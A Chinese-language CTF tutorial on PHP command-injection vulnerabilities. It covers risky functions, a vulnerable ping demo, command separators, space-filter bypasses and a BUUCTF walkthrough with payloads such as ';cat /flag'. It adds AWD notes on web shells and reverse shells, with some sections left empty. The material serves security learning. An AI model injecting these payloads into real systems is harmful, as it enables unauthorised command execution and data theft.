命令執行

命令執行是一種攻擊，其目標是通過易受攻擊的應用程序在主機操作系統上執行任意命令。當應用需要調用一些外部程序去處理內容的情況下，就會用到一些執行系統命令的函數。

比如PHP中的system,exec,shell_exec等，當用戶可以控制命令執行中的參數時，將可注入惡意系統命令到正常命令中，造成命令執行攻擊。

簡單舉例來說就是，比如想要創建一個目錄，可能不會用代碼創建，但是知道系統命令是mkdir，借助系統命令mkdir來創建目錄。
舉例：cp /tmp/sourcefile /app/public/#{userinput}.jpg
cp是copy拷貝，將sourcefile拷貝到圖片中去
如果用戶的輸入（userinput）是aaa;cat /flag，那么還會讀取flag中的內容

命令注入是一種常見的 漏洞形態。一旦存在命令注入漏洞，攻擊者就可以在目標系統執行任意命令。

命令注入攻擊常用在向程序傳入不安全參數（命令行參數、http頭、cookie）。

注意：命令執行需要：
1.執行系統命令
2.執行的系統命令（參數）至少是可控的（或者部分可控），傳參的地方就是用戶可控的地方

命令執行繼承Web Server用戶的權限，一般都有權限寫文件，寫馬、查看隱私信息、竊取源碼，甚至可以反彈shell，危害十分大。
（用戶通過服務器執行了php代碼實現執行系統命令，所以說“命令執行繼承Web Server用戶的權限”）

一般Linux下最高權限是root，Web server下一般是www-data權限

漏洞位點

程序過濾不嚴謹，導致用戶可以將代碼注入并執行。

高危函數：
eval(),assert(),preg_replace(),call_user_func()等等

對于執行命令的函數，參數過濾不嚴謹，導致直接命令執行。

高危函數：
system(),exec(),shell_exec(),passthru(),pctnl_exec(),popen(),proc_open()
注：反引號是shell_exec()的別名

比如echo ls

代碼注入

程序過濾不嚴謹，導致用戶可以將代碼注入并執行。

高危漏洞：
eval(),assert(),preg_replace(),call_user_func()等等

和命令執行的 區別是：
一個執行系統命令，一個執行PHP代碼

漏洞利用

看一個Demo：

<?php if (isset($_GET['ip'])){$ip = $_GET['ip'];echo shell_exec("ping -c 4 " . $ip); }else{highlight_file(__file__); }

正常情況下，輸入主機地址，則正常返回命令執行結果

代碼中的ip參數是直接通過GET方式傳入并直接帶入了命令中，這時嘗試一下使用分隔符并添加一條命令

127.0.0.1;ls -l

聯合執行

分號

cmd1;cmd2;cmd3

cmd1將首先運行，不管cmd1運行成功還是出現錯誤，cmd2都會在它之后運行，當cmd2命令完成時，cmd3將會運行

三個命令互不干擾

&&

有時候希望確保Linux命令中，只有在前一個命令成功結束時，下一個命令才會執行。這就是邏輯和運算符&&出現的地方

cmd1 && cmd2 && cmd3

當第一個命令出現錯誤時，&&分隔符的命令會停止執行后面的命令。

｜｜

可以使用邏輯操作符（｜｜）運行命令行，但是只有在前一個命令出現錯誤時才運行下一個命令：

cmd1 || cmd2 || cmd3

如果cmd1運行失敗，則運行cmd2。如果cmd2運行成功,cmd3將不會運行。

｜

前一個命令的結果作為后一個命令的參數

cmd1 | cmd2

例如：

echo xxx | base64

換行符
%0a
%0d

練習:actf2020exec 平臺BUUCTF

首先嘗試127.0.0.1

127.0.0.1;ls

;cat /flag

得到flag是flag{3e9af367-c215-4a33-9196-4b5314327d9f}

Bypass

過濾空格
$IFS
${IFS} //加{}是為了區分（間隔）
$IFS$9
< //在Linux中<表示導入
<>
{cat,flag.php} //用逗號實現了空格功能，需要用{}括起來
%20
%09

過濾某關鍵字

練習題目：

空格過濾

顯然過濾了很多東西：


不報錯了：（查看源代碼得到flag）

flag{0af120ba-cd98-43e9-a099-3f9abac9de96}

變量

（上面那道GXYCTF就是一道用變量解決的例子）

PS補充

1.awd比賽中：無法刪去別人的 馬

www-data和ctf/test不屬于一個用戶組
解決辦法：自己寫一個馬給自己，通過蟻劍連接Web Shell，通過這個Web shell去刪除別人 的Web shell

2.如果別人中的馬是每隔1秒寫一個馬，如何解決？

（如果別人的馬是通過網頁寫的）
給自己寫個馬，連接Web shell (使自己變成www-data組的用戶)，再去執行kill -9 -1

若對方是（不是通過網頁寫的）：

那么應該我應該執行：

3.反彈shell
如果已知IP和端口號：

總結

以上是生活随笔為你收集整理的命令执行漏洞-命令执行-漏洞位点- 代码注入-漏洞利用-联合执行-Bypass（空格，关键字过滤，变量绕过）-例题两道-actf2020exec-GXYCTF2019 Ping Ping Ping的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。